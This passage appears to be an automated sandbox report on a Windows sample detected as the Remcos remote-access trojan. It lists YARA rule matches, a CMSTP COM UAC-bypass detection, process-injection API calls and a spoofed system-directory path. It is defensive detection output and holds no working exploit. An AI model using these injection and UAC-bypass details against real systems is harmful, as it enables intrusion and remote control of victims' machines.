Source: Yara match File source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 8_2_0467CA73 SystemParametersInfoW
                  Source: C:\Windows\SysWOW64\SndVol.exe, Code function: 17_2_0041CA6D SystemParametersInfoW
                  Source: C:\Windows\SysWOW64\SndVol.exe, Code function: 17_2_0041CA73 SystemParametersInfoW
                  Source: C:\Windows\SysWOW64\SndVol.exe, Code function: 17_2_0513D788 SystemParametersInfoW
                  Source: C:\Windows\SysWOW64\SndVol.exe, Code function: 17_2_0513D78E SystemParametersInfoW

                  System Summary

                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_0289B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_02897A2C NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_0289DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_0289DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_02897D78 NtWriteVirtualMemory
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_0289DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_028984C8 NtProtectVirtualMemory
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_02897A2A NtAllocateVirtualMemory
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_0289DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_02898D6E GetThreadContext,SetThreadContext,NtResumeThread
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_02898D70 GetThreadContext,SetThreadContext,NtResumeThread
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B164CA NtQueryInformationToken
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B1643A NtOpenThreadToken,NtOpenProcessToken,NtClose
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B14823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B27460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B2C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B2A135 NtSetInformationFile
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B16500 NtQueryInformationToken,NtQueryInformationToken
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B04E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B14759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B164CA NtQueryInformationToken
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B1643A NtOpenThreadToken,NtOpenProcessToken,NtClose
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B14823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B27460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B2C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B2A135 NtSetInformationFile
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B16500 NtQueryInformationToken,NtQueryInformationToken
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B04E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp
                  Source: C:\Users\Public\alpha.pif, Code function: 10_2_00B14759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_0281B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_02817A2C NtAllocateVirtualMemory
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_0281DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_02817D78 NtWriteVirtualMemory
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_028184C8 NtProtectVirtualMemory
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_02817A2A NtAllocateVirtualMemory
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_0281DBB0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_0281DC8C RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_0281DC04 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_02818D6E Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIF, Code function: 16_2_02818D70 Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next
                  Source: C:\Windows\SysWOW64\SndVol.exe, Code function: 17_2_0513E33B NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
                  Source: C:\Users\Public\alpha.pif, Code function: 5_2_00B04C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z
                  Source: C:\Users\user\Desktop\AWkpqJMxci.exe, Code function: 0_2_028A8128 CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess
                  Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 8_2_046767EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\SysWOW64\SndVol.exe, Code function: 17_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\SysWOW64\SndVol.exe, Code function: 17_2_0513750A ExitWindowsEx,LoadLibraryA,GetProcAddress
                  Source: C:\Users\Public\alpha.pif, File created: C:\Windows
                  Source: C:\Users\Public\alpha.pif, File created: C:\Windows \SysWOW64
                  Source: C:\Users\Public\alpha.pif, File deleted: C:\Windows \SysWOW64
Source: AWkpqJMxci.exe | Binary or memory string: OriginalFilename vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E693000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000003.1768938154.000000000E664000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FBBF000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1805021411.000000007FB50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1782458415.00000000023DE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5FA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D65F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs AWkpqJMxci.exe
Source: AWkpqJMxci.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
